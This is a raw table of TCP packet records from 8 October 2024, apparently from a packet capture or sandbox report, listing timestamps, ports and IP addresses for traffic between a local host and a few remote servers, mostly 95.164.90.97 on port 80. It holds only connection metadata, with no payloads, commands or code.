Oct 8, 2024 20:47:32.537403107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537405968 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537436962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537451029 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537487030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537506104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537539005 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537555933 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537570953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537585974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537602901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537620068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537635088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537653923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537668943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537684917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537700891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537719011 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537734985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537744999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537769079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537781000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537796021 CEST	443	49829	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.537817001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537823915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537857056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537889957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537910938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537924051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.537945986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537970066 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.537981987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538011074 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538027048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538049936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538062096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538095951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538106918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538129091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538140059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538161993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538175106 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538193941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538204908 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538228989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538238049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538263083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538275957 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538296938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538305998 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538331032 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538341045 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538363934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538374901 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538397074 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538405895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538414001 CEST	49829	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.538430929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538450956 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538463116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538479090 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538479090 CEST	443	49829	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.538496971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538530111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538532019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538549900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538563967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538597107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538609982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538631916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538636923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538666010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538677931 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538697958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538707972 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538743019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538749933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538784027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538791895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538816929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538829088 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538850069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538861036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538882971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538896084 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538916111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538925886 CEST	49829	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.538938999 CEST	443	49829	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.538949966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538949966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538963079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.538985014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.538995028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539033890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539046049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539067984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539081097 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539099932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539114952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539134026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539149046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539166927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539180994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539201021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539216042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539239883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539247036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539278984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539283991 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539314985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539329052 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539352894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539355993 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539397955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539405107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539439917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539453983 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539474010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539489985 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539516926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539524078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539551020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539557934 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539585114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539598942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539618969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539637089 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539669991 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539675951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539710045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539724112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539743900 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539757967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539777994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539793968 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539812088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539824963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539844990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539859056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539879084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539892912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539912939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539926052 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539946079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.539961100 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.539990902 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.542195082 CEST	443	49830	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.542568922 CEST	49830	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.542597055 CEST	443	49830	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.542851925 CEST	49830	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.542865992 CEST	443	49830	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.546598911 CEST	443	49831	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.548444033 CEST	49831	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.548451900 CEST	443	49831	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.548778057 CEST	49831	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:32.548782110 CEST	443	49831	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:32.554311037 CEST	443	49723	23.1.237.91	192.168.2.5
Oct 8, 2024 20:47:32.555250883 CEST	49723	443	192.168.2.5	23.1.237.91
Oct 8, 2024 20:47:32.623862028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.624034882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.624053001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.624093056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.624277115 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.624314070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.624331951 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.624365091 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.624424934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.624459028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.624480009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.624491930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.624506950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.624527931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.624542952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.624639034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.624731064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.624763966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.624782085 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.624799013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.624813080 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.624833107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.624846935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.624866962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.624882936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.624902010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.624918938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.624952078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625124931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625157118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625176907 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625190973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625205994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625228882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625240088 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625262022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625281096 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625294924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625307083 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625328064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625344992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625379086 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625379086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625400066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625413895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625428915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625428915 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625449896 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625452995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625459909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625472069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625478983 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625488997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625498056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625504017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625519991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625531912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625535965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625550985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625565052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625567913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625575066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625581980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625586033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625598907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625611067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625612020 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625622034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625633955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625634909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625646114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625653982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625657082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625667095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625669956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625684023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625685930 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625694990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625705957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625711918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625716925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.625731945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625756979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.625771999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.626369953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626382113 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626391888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626405001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626416922 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626421928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.626430035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626440048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626449108 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.626467943 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.626492023 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.626513004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626527071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626538038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626552105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626564026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626563072 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.626574993 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.626575947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626588106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626600027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626607895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.626610994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626622915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626632929 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.626636028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626647949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626647949 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.626657963 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626668930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626673937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.626679897 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626691103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.626698971 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.626717091 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.626722097 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.627487898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.627499104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.627516985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.627528906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.627537966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.627538919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.627551079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.627561092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.627562046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.627572060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.627583027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.627588034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.627593994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.627604961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.627613068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.627614975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.627626896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.627634048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.627639055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.627652884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.627652884 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.627662897 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.627693892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.628015995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628026962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628036976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628047943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628058910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628068924 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.628086090 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.628097057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.628124952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628137112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628146887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628159046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628174067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628180027 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.628186941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628199100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628202915 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.628211021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628221989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628221989 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.628232002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628235102 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.628245115 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628256083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628262997 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.628268003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628279924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628284931 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.628289938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628293037 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.628302097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.628321886 CEST	49755	80	192.168.2.5	95.164.90.97
